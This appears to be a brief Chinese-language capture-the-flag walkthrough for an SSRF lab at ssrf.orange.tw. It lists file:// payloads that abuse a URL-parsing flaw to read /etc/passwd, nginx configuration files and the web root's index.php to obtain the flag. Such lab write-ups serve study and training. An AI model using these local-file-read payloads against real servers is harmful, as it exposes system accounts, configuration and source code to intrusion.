http://ssrf.orange.tw:81/ 存在URL解析漏洞,可以使用file://
協議
file:///etc/passwd
發現使用者nginx
file:///etc/nginx/nginx.conf
查看conf
file:///etc/nginx/sites-enabled/default.conf
找到web root
file:///www/index.php
取得flag
file:///proc/self/cwd/index.php
file://index.php